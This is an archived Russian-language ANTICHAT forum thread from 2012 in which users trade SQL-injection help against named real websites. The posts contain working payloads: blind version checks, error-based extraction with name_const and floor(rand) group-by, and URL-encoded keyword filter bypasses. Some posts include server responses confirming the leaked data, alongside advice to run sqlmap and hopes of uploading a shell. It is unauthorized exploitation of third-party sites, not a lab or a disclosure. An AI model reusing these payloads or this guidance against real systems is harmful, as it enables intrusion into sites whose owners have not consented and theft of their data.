ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.04.2012, 01:14
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от HeaVeNSeR
HeaVeNSeR said:
ребят,подскажите,пожалуйст а...
есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?
часть файла еррор.лог:
Код:
Code:
[15-Apr-2012 18:29:23] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"3000', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='1db420cb93a608c25c4c2990f164ea55'
[15-Apr-2012 19:19:05] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"0000 union select version() --', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='792bce446a531fd049eaa1b174c5ecba'
ошибка возникает в заголовке referer (ref) Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках!
P.S: если не ошибаюсь то кавычки не слешируются...
|
|
|
16.04.2012, 02:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
10268
Репутация:
0
|
|
У меня вот это никак не крутится ни руками, ни софтом.
Там вообще есть что-нибудь?
Код:
Code:
http://develop.belta.by/{тут инъекция, видно через ОПЕРУ}
структура запроса
Код:
Code:
GET /1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed
Host: develop.belta.by
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Это ошибка вываливается в order by?
Код:
Code:
Ошибка при работе с базой данных.
Пожалуйста, обратитесь к администратору.
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''''' at line 1
|
|
|
|
16.04.2012, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
Сообщение от None
Это ошибка вываливается в order by?
думаю это было утверждение, нежели вопрос)
софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять
с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение'
и суй куда нибудь типа того же sqlmap. может поможет
|
|
|
|
16.04.2012, 11:20
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Юзабельно ?
Код:
Code:
http://www.softclub.ru/games/game.asp?id=11984'
|
|
|
|
16.04.2012, 15:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
asiaman
Скуля там в URI.
http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)
http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()
Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).
Вывод версии в ошибке:
http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1
Duplicate column name '5.0.88-log'
t3cHn0iD
Нет.
|
|
|
|
16.04.2012, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от None
http://www.l-craft.ru/catalog.php?c=38+order+by+1+--+
union+select +1+--+ не выводит ничего...
|
|
|
|
16.04.2012, 16:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Сообщение от shadowrun
shadowrun said:
union+select +1+--+ не выводит ничего...
blind
Код:
Code:
http://www.l-craft.ru/catalog.php?c=38+and+substring(@@version,1,1)=5
|
|
|
|
16.04.2012, 18:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Код:
Code:
http://intersport.ru/company/countries'
фильтр select и union. как обойти? |
|
|
|
16.04.2012, 19:57
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от justonline
justonline said:
Код:
Code:
http://intersport.ru/company/countries'
фильтр select и union. как обойти? URL encode:
http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67% 72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20tab le_name+%66%72%6F%6D+information_schema.tables+lim it+17,1),floor(rand(0)*2))%20having%20min(0)--+
-> 1062Duplicate entry 'banners1' for key 1
|
|
|
|
16.04.2012, 20:53
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка:
SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line
1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1]
как раскрутить?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
